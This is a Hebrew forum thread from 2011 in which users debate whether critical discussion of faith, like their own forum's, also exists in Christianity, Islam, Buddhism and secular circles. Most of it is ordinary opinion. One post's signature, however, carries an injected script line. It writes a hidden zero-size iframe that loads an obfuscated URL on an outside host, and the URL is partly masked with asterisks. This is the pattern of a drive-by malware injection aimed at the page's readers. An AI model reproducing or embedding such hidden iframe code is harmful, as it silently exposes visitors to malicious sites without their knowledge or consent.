| נשלח ב-14/6/2011 22:05 |
|
| |
האם תופעת עצכ"ח יחודית רק לנו?
בעודי מתבונן באשכולות שנפתחו כאן לאחרונה עלתה בי השאלה האם אפשר למצוא פורומים דוגמת עצכ"ח בנצרות באסלאם בבודהיזם? או נלך אפילו יותר קרוב אצל החילונים פה בארץ. האם גם שם קיימים בירורים או שאלות מהותיות האם הכל בלוף או אמת או ניסיונות לסלק קליפות לא נחוצות שנספחו עם השנים או שמדובר בתופעה יחודית לנו בלבד.
|
|
|
|
| נשלח ב-14/6/2011 22:12 |
|
| |
כן אפשר למצוא. עיין גוגל
|
|
|
|
| נשלח ב-15/6/2011 00:58 |
|
| |
ברור שניתן למצוא. מטבע הדברים, שאלות אלו מעסיקות יותר דתיים ויותר ככל שהדת משפיעה על אורח החיים. בימינו "האטמוספירה" היא חילונית ואלו שאינם דתיים לא חשים צורך (בדרך כלל) לתת לעצמם דין וחשבון למה הם חילונים. ההלכה גם משפיעה על כל תחומי החיים ויש שסבורים שעל החשיבה, ברור שבהרבה מקרים זה יגרום לחשיבה "למה כל זה ולמה זה מוביל".
|
|
|
|
| נשלח ב-15/6/2011 08:55 |
|
| |
דייר
הנצרות מלאה בויכוחים סוערים על אמונותיה כמעט מאז היווסדה. חלק מבעלי הדעות החורגות הוכנסו לרשימת המחברים והספרים האסורים (שם יושב גם שפינוזה היהודי לצד ראשוני נצרות שכפרו בכך שיש"ו הוא אלוהים בנסתר).
בתקופה המודרנית (נניח מאה מאתיים שנה לפי המועט הידוע לי, וזה לא תחום התמחות שלי) יש קבוצות (כתות?) בנצרות שעוסקות במרץ בפילוסופיה בצורה מאד כנה. זה מצוי למשל אצל הקתולים. הם כותבים ספרי מחקר טובים מאד - אל נשכח שהם כמו אברכים בכך שחלקם נזירים ונזירות, כך שהם מסודרים מצד הפרנסה וגם אינם מבזבזים זמן על משפחה... הם מודים בפה מלא שהמקורות ההיסטוריים שלהם לא בהכרח מהימנים, ועוסקים בבירורים היסטוריים שלא נעימים לבעלי אמונה.
כאן עלי להוסיף, כדי שלא יצא שאני מהלל בני דתות אחרות סתם. (אם כי אמת היא אמת רק שאצלם הבסיס חסר). אנו היהודים, לדעתי ולדעת רבים (אבל לא כל חברי הפורום) נהנים מכך שהבסיס שלנו אמיתי (ולמעשה בנה את עולם הרוח המערבי). לנוצרים יש בעיה. הבסיס של הנצרות שקרי. יש"ו, אם היה קיים וכנראה היה, לא היה בנו של אלוהים, לא מעבר למטאפורה שנכונה לגבי כל אדם. מאז אימצה הנצרות (הקתולית לפחות ובנותיה) דוגמות מחייבות ובלתי אפשריות, יש נסיון להתמודד עם הבעייתיות שלהן וזה נעשה אולי לא עם מסקניות (אין הודאה שהתכנים הפנימיים שקריים עד כמה שידוע לי) אבל עם התמודדות עם ביקורות היסטוריות, הבדלה בין דעות מקוריות לפרשנות מאוחרת, ועוד).
ואצלנו? עצכח זה דבר אחד ולמרבה הצער קצת ייחודי, לפחות בהיותו בפרהסיה. אבל אצלנו החינוך הוא לאמץ גם שקרים (נניח היות הזוהר ספר מוקדם ועתיק וקדוש ודובר אמת) לצד האמת הפשוטה היסודית שבבסיס דתנו.
אני כבר רואה לנגד עיני את ייתכן שלנו הטוב יוצא נגד האמירה שלי. וכי מי אמר שהאמונות של דת השכונה היהודית הן אמיתיות? נאמר לפחות כך כתשובה: האמיתות שלנו אינן מופרכות מתוכן. האמונות הנוצריות כן.
ובכל זאת, אצל הנוצרים יש שכבה אינטלקטואלית שעוסקת במרץ בביקורת עצמית. הדוגמא הבולטת שלה שיצאה החוצה היתה האפיפיור יוחנן פאולוס הראשון, שכנגד כל מחרימי האבולוציה אמר שהאבולוציה יכולה להיות אמת (או אמיתית) והיא האופן שהאלקים מנהיג את העולם.
ואצלנו? דוגמא פעוטה שאינה כה שולית היא של אותו רב שכתב ספר על ביולוגיה (שכחתי את שמו, אבל הוא נידון בפורום) והוחרם על ידי רבנים מפורסמים שאפילו לא קראו את הספר.
אז עצכח הוא אכן נקודה טובה, אם כי הפורום הפך ממעון לחרדים שואלים וזוכים לתשובות למקום של ויכוחים סוערים, אבל גם זו לטובה. אבל מדוע יש רק עצכח אחד כזה?
ועוד השוואה לנצרות הקתולית (ואולי התומיסטית, כבר כתבתי שאיני מתמצא בתחום). אצלם יש שילוב של מחקר אקדמי עם דתיות עמוקה, רצינית ומחוייבת. שוב, אני מהסס אם לכתוב שבחים על דת אחרת ושקרית. אבל אי אפשר לקחת את הנקודה הזו מהם, שנראית מפירסומים שונים שלהם. ואצלנו? המחקר האקדמי של "מדעי היהדות" עוסק, לדעתי, בהשמצות, בזלזול, בעקירה לשם עקירה. היהדות הישיבתית סגורה בעצמה ואינה מוכנה לשום ביקורת גם כאשר מדובר באמונות הבל ושקר. היכן המחקר ברמה אחראית ואקדמית שישלב בין זה לזה?
___תוקנו טעויות בולטות______________
שומר פיו ולשונו - שומר מצרות נפשו
******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");>
תוקן על ידי מיימוני ב- 15/06/2011 08:58:07
 |
|
|
|
|
| נשלח ב-15/6/2011 09:11 |
|
| |
.
ואני לתומי חשבתי שמישהו יכתוב, שעצם העובדה שיש גרים, מעיד שהם היו לפניכן חוקרים ובודקים ומחפשי אמת...
|
|
|
|
| נשלח ב-15/6/2011 09:17 |
|
| |
מואדיב ומומרים?
|
|
|
|
| נשלח ב-15/6/2011 10:23 |
|
| |
בעל האם אתה לא קורא את התגובות של כמה מחברנו, המומרים יוצאים מעצכ"ח האורגינלי.
|
|
|
|
| נשלח ב-15/6/2011 10:25 |
|
| |
| בעלבעמיו כתב: |  | מואדיב
ומומרים? |
|
נו, זה כל מחב"ת ייגד לך - הייצר תוקפם ;-)
|
|
|
|
| נשלח ב-15/6/2011 10:58 |
|
| |
לי זה נותן את הרושם שהכל קליל הדת לא נתפסת בכזאת רצינות במיוחד לא בבודהיזם ודתות המזרח. עושים שם פסטיבלים דתיים וטקסים מוזרים ולא נראה לי שמישהו שואל את עצמו האם זה מתאים למאה ה 21 זורמים עם הדת כי זה חלק מאורח החיים מעניין אם גם שם יש דיונים כבדי משקל על מורשתו של בודהה למשל או חקירה מדעית בכתביו מצד סתם עמך בודהיסטים.
|
|
|
|
| נשלח ב-15/6/2011 11:12 |
|
| |
דייר ראית פעם נזיר בודהיסטי שאין לו כלום?
|
|
|
|
| נשלח ב-15/6/2011 11:15 |
|
| |
יש את אלה שלוקחים את זה ברצינות במקביל לרבנים אצלינו אבל שאר העם לא עושה מזה כזה ביג דיל יכול להיות שאני טועה אני אשמח לשמוע ממישהו שמכיר בקרוב בסה"כ מדובר ב"קולגות" שלנו מעניין לדעת מה הולך אצלם.
|
|
|
|
|
| נשלח ב-15/6/2011 11:35 |
|
| |
גם אצלנו הרוב לא לוקח ברצינות, לכל היות אתה יכול לטעון שהוא אמור לקחת ברצינות.
|
|
|
|
| נשלח ב-15/6/2011 11:41 |
|
| |
דייר איזו בודהיזם אתה מכיר? כמה ספרים קראת על הדת הזו? להזכירך דת הבודהיסתית מסועפת ומחולקת יותר מהיהדות. יש הינדית -סנסקריט- זן -סינית - יפנית- טאואיזם, ויש עוד- העצכ"ח אצלם הוא חלק מאמונתם
בפורום כמו שלנו לא מפריחים דעות וידיעות על דתות אחרות- כמו שאתמול הפריחו על הנצרות ועל האיסלם ואחרות, מפגינים ידע, כשהכותב לא פתח מעולם ספר של הדתות האחרות, לא למד או שוחח עם איש דת נוצרי כל שהו או מוסלמי. אבל יודעים להשוות -קובעים דעות- וכתוצאה מכך גם מגיעים למסקנות אולטימטיביות, של סוף פסוק נקודה
|
|
|
|
| נשלח ב-15/6/2011 13:27 |
|
| |
מיימוני כתב: <המחקר האקדמי של "מדעי היהדות" עוסק, לדעתי, בהשמצות, בזלזול, בעקירה לשם עקירה>.
לענ"ד המחקר האקדמי של "מדעי היהדות" בימינו עוסק בבנייה והארת מקורות היהדות. (כמובן שלא כל החוקרים, ולא כל המחקרים). די אם נזכיר שמות כמו: קויפמן, הרן, קאסוטו, ויינפלד, יפת, אחיטוב ועוד רבים בתחום המקרא; אפשטיין, לוין, אלבק, ליברמן, אורבך, רוזנטל (האב והבן), זוסמן, ברודי, הלבני, פרידמן, הנשקה ועוד רבים בתחומי חז"ל והגאונים.
ייתכן שמי שמתבצר בקיבעון מסוים וקשה לו נפשית להתמודד באופן חיובי ויצירתי עם ממצאים או דעות של המחקר, ירגיש שהמחקר עוסק בעקירה. או מי שאינו מכיר דיו את המחקר המודרני, אלא תקוע עדיין עם גרץ וגייגר למשל [למרות שגם אצלם יש הרבה גרעינים של בניה והארה]. באותה מידה יכול מישהו קיצוני קצת יותר להסתכל על הכופר בקבלה כהורס, עוקר ומזלזל.
והאמת והשלום אהבו
תוקן על ידי מתעבשקר ב- 15/06/2011 13:41:32
|
|
|
|
| נשלח ב-15/6/2011 13:52 |
|
| |
בשנים האחרונות הזדמנו לי כמה פגישות עם נוצרים אדוקים, ומוסלמים אדוקים. הדמיון בין הנושאים המעסיקים אנשים דתיים מכל הדתות הוא מדהים. אפילו הטרימינולוגיה וסולם הערכים כמעט זהה, וסוגי הטיעונים זהים ממש, עד כדי חשד להעתקה. דרך אגב, תופעת עצכ"ח אינה אופיינית כלל ליהדות... להיפך, היא די מנוגדת ליהדות, ולכל דת שהיא. תופעת עצכ"ח אופיינית לעולם התקשורת החדש שקם מתוך התפתחות האינטרנט. תופעה זו, היא סכנה הרסנית לדת, [לפחות זו הסוציולוגית, שבינינו, זוהי הדת...] כיון שהיא חותרת תחת חומות הבורות שהדת מקימה סביב למאמיניה.
|
|
|
|
|